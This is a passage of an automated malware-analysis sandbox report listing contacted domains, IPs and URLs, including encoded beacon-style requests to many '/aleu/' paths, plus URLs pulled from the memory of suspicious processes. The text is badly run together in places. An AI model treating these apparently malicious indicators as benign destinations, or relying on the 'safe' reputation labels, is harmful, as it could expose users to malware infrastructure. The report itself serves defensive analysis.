                http://www.solesense.pro/aleu/?MzYDklf=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUF3Q4RMAPDGkyPIDahDw1KMSvyAVfpPYGa57LB1vixmbDZ7oyoAgNkZW7&PHaLL=ePmHKpKXdtoDqXh0%Avira URL Cloudsafe
                http://nginx.net/0%Avira URL Cloudsafe
                http://www.theertyuiergthjk.homes/aleu/?MzYDklf=KKNe6rdgfNo6Wq6sMccsECj9DruDiqz0V/YBvfR/8knlzlDvcza3RWVYHFV7uOHMzESi0Z4HuGcox/fHqa9ciWlD8AlULX7tFKEX0vEvV/3H5nGwz5PpKkk9QKafXX45AA2PEYjdzWMv&PHaLL=ePmHKpKXdtoDqXh0%Avira URL Cloudsafe
                http://www.theertyuiergthjk.homes/aleu/0%Avira URL Cloudsafe
                https://oblzpezqqfxqijsk.app1%VirustotalBrowse
                http://www.solesense.pro/aleu/0%VirustotalBrowse
                http://www.valentinaetommaso.it/aleu/?MzYDklf=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjXe/ogXVNID+KtV4n0lPZ2DbPfuvRPmVg0GTYTl/4fOclA5m+2/uM8Ymx&PHaLL=ePmHKpKXdtoDqXh0%Avira URL Cloudsafe
                http://nginx.net/0%VirustotalBrowse
                http://www.theertyuiergthjk.homes/aleu/0%VirustotalBrowse
                https://api2.wanjd.cn/h5_share/ads/zs0%Avira URL Cloudsafe
                https://www.valentinaetommaso.it/page-not-found-404/0%Avira URL Cloudsafe
                http://www.skibinscy-finanse.pl/aleu/?MzYDklf=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sN/a7W8oTa9PDfIw3FkTWG11zhaPiohVHadQfG1I8c2eUqprtDPLWhOJ9&PHaLL=ePmHKpKXdtoDqXh0%Avira URL Cloudsafe
                https://oss.wanjd.cn/owx/read/20230906001.png0%Avira URL Cloudsafe
                http://www.paydayloans3.shop/aleu/0%Avira URL Cloudsafe
                http://www.colchondealquiler.com/aleu/0%Avira URL Cloudsafe
                http://www.polhi.lol/aleu/0%Avira URL Cloudsafe
                http://www.fairmarty.top/aleu/0%Avira URL Cloudsafe
                https://oss.wanjd.cn/owx/read/wx-read/cos/js/flexible.js0%Avira URL Cloudsafe
                http://www.83634.cn/aleu/0%Avira URL Cloudsafe
                http://www.paydayloans3.shop/aleu/0%VirustotalBrowse
                https://oss.wanjd.cn/owx/read/wx-read/cos/css/llc.css?ver=00020%Avira URL Cloudsafe
                https://oss.wanjd.cn/owx/read/wx-read/cos/css/index.css?ver=00090%Avira URL Cloudsafe
                http://www.colchondealquiler.com/aleu/0%VirustotalBrowse
                http://www.polhi.lol/aleu/0%VirustotalBrowse
                https://oss.wanjd.cn/owx/read/wx-read/cos/css/hui/hui.css?v=00010%Avira URL Cloudsafe
                http://www.skibinscy-finanse.pl/aleu/0%Avira URL Cloudsafe
                http://www.colchondealquiler.com/aleu/?MzYDklf=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUglop6X2S27Gspv7OD0R2VJ9wdDlZRLUHIVLQGAdIrEvlBBmGQJQcRJvk2sI&PHaLL=ePmHKpKXdtoDqXh0%Avira URL Cloudsafe
                http://www.83634.cn/aleu/?MzYDklf=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEtJ1bmNcMNYXAdylBBvNZ9o6IpjigtOzYHQeGXYHcYUjCnGBIU602CyDs&PHaLL=ePmHKpKXdtoDqXh0%Avira URL Cloudsafe
                http://www.aprovapapafox.com/aleu/?MzYDklf=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5GrlDAC6fqoF7t8GqbmfMFKfVEQELjrUu0IX3uTvnqRm05V4BpU+RhfzS&PHaLL=ePmHKpKXdtoDqXh0%Avira URL Cloudsafe
                http://www.valentinaetommaso.it/aleu/0%Avira URL Cloudsafe
                https://oss.wanjd.cn/owx/ys_share/daily/back1.png0%Avira URL Cloudsafe
                http://www.83634.cn/aleu/0%VirustotalBrowse
                https://oss.wanjd.cn/owx/read/wx-read/cos/css/animate.min.css?v=202309190010%Avira URL Cloudsafe
                http://www.skibinscy-finanse.pl/aleu/0%VirustotalBrowse
                http://www.solesense.pro0%Avira URL Cloudsafe
                http://www.fairmarty.top/aleu/?MzYDklf=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpX9hrZ8kVd6B8qbB5+OCtdAqRU7IipAokYiIG2rDB/a+dgcBIv0Zff4BY&PHaLL=ePmHKpKXdtoDqXh0%Avira URL Cloudsafe
                http://www.aprovapapafox.com/aleu/0%Avira URL Cloudsafe
                http://www.valentinaetommaso.it/aleu/1%VirustotalBrowse
                http://www.aprovapapafox.com/aleu/0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.theertyuiergthjk.homes
                		205.234.233.38
                		truetrue
                  		unknown
                  www.maxiwalls.com
                  		79.98.25.1
                  		truetrueunknown
                  www.skibinscy-finanse.pl
                  		178.211.137.59
                  		truetrueunknown
                  www.paydayloans3.shop
                  		64.190.62.22
                  		truetrue
                    		unknown
                    aprovapapafox.com
                    		162.240.81.18
                    		truetrueunknown
                    parkingpage.namecheap.com
                    		91.195.240.19
                    		truefalse
                      		high
                      vf3ba6qx.as22566.com
                      		103.93.124.160
                      		truetrue
                        		unknown
                        lb.webnode.io
                        		3.125.172.46
                        		truetrueunknown
                        fix01.pfw.djamxtvyk.cloudland3.com
                        		52.175.38.24
                        		truefalse
                          		unknown
                          www.colchondealquiler.com
                          		217.76.128.34
                          		truetrueunknown
                          www.fairmarty.top
                          		203.161.46.103
                          		truetrue
                            		unknown
                            www.choosejungmann.com
                            		unknown
                            		unknowntrueunknown
                            www.toyzonetshirts.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.83634.cn
                              		unknown
                              		unknowntrue
                                		unknown
                                www.aprovapapafox.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.www60270.xyz
                                  		unknown
                                  		unknowntrueunknown
                                  www.avoshield.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.polhi.lol
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.valentinaetommaso.it
                                      		unknown
                                      		unknowntrueunknown
                                      www.onitsuka-ksa.com
                                      		unknown
                                      		unknowntrueunknown
                                      www.solesense.pro
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.solesense.pro/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.paydayloans3.shop/aleu/?MzYDklf=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZnRruwwT6g/D0s8W22E0wG3Y43Svl+j8+gYa6G242ZIg/F531ut75LnnH&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.solesense.pro/aleu/?MzYDklf=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUF3Q4RMAPDGkyPIDahDw1KMSvyAVfpPYGa57LB1vixmbDZ7oyoAgNkZW7&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.theertyuiergthjk.homes/aleu/?MzYDklf=KKNe6rdgfNo6Wq6sMccsECj9DruDiqz0V/YBvfR/8knlzlDvcza3RWVYHFV7uOHMzESi0Z4HuGcox/fHqa9ciWlD8AlULX7tFKEX0vEvV/3H5nGwz5PpKkk9QKafXX45AA2PEYjdzWMv&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.theertyuiergthjk.homes/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.valentinaetommaso.it/aleu/?MzYDklf=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjXe/ogXVNID+KtV4n0lPZ2DbPfuvRPmVg0GTYTl/4fOclA5m+2/uM8Ymx&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.skibinscy-finanse.pl/aleu/?MzYDklf=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sN/a7W8oTa9PDfIw3FkTWG11zhaPiohVHadQfG1I8c2eUqprtDPLWhOJ9&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.paydayloans3.shop/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.colchondealquiler.com/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.polhi.lol/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fairmarty.top/aleu/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.83634.cn/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.skibinscy-finanse.pl/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.colchondealquiler.com/aleu/?MzYDklf=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUglop6X2S27Gspv7OD0R2VJ9wdDlZRLUHIVLQGAdIrEvlBBmGQJQcRJvk2sI&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.83634.cn/aleu/?MzYDklf=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEtJ1bmNcMNYXAdylBBvNZ9o6IpjigtOzYHQeGXYHcYUjCnGBIU602CyDs&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.aprovapapafox.com/aleu/?MzYDklf=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5GrlDAC6fqoF7t8GqbmfMFKfVEQELjrUu0IX3uTvnqRm05V4BpU+RhfzS&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.valentinaetommaso.it/aleu/true
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fairmarty.top/aleu/?MzYDklf=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpX9hrZ8kVd6B8qbB5+OCtdAqRU7IipAokYiIG2rDB/a+dgcBIv0Zff4BY&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.aprovapapafox.com/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabreplace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://assets.iv.lt/header.htmlreplace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://d1di2lzuh97fh2.cloudfront.net/files/0q/0q2/0q229t.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ogp.me/ns#replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.jsreplace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://d1di2lzuh97fh2.cloudfront.net/files/2q/2qj/2qjoy2.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.iv.lt/domenai/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://nginx.net/replace.exe, 00000015.00000002.3685026177.0000000004B46000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000046C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://oblzpezqqfxqijsk.appreplace.exe, 00000015.00000002.3685026177.000000000436C000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003EEC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • 1%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://fedoraproject.org/replace.exe, 00000015.00000002.3685026177.0000000004B46000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000046C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signaturereplace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=smsreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutionsreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://assets.iv.lt/images/thumbnail.pngfirefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.iv.lt/duomenu-centras/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordpreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.iv.lt/profesionalus-hostingas/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominioreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://api2.wanjd.cn/h5_share/ads/zsreplace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.valentinaetommaso.it/page-not-found-404/yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://assets.iv.lt/footer.htmlreplace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vpsreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://d1di2lzuh97fh2.cloudfront.netreplace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.iv.lt/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.ecosia.org/newtab/replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://oss.wanjd.cn/owx/read/20230906001.pngreplace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://d1di2lzuh97fh2.cloudfront.net/files/2j/2jh/2jh1ov.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.iv.lt/vps-serveriai/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://klientams.iv.lt/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://arsys.es/css/parking2.cssreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campareplace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://oss.wanjd.cn/owx/read/wx-read/cos/js/flexible.jsreplace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=rereplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsysreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloudreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dereplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://events.webnode.com/projects/-/events/replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://assets.iv.lt/default.cssreplace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://d1di2lzuh97fh2.cloudfront.net/files/1e/1em/1empxr.js?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		high
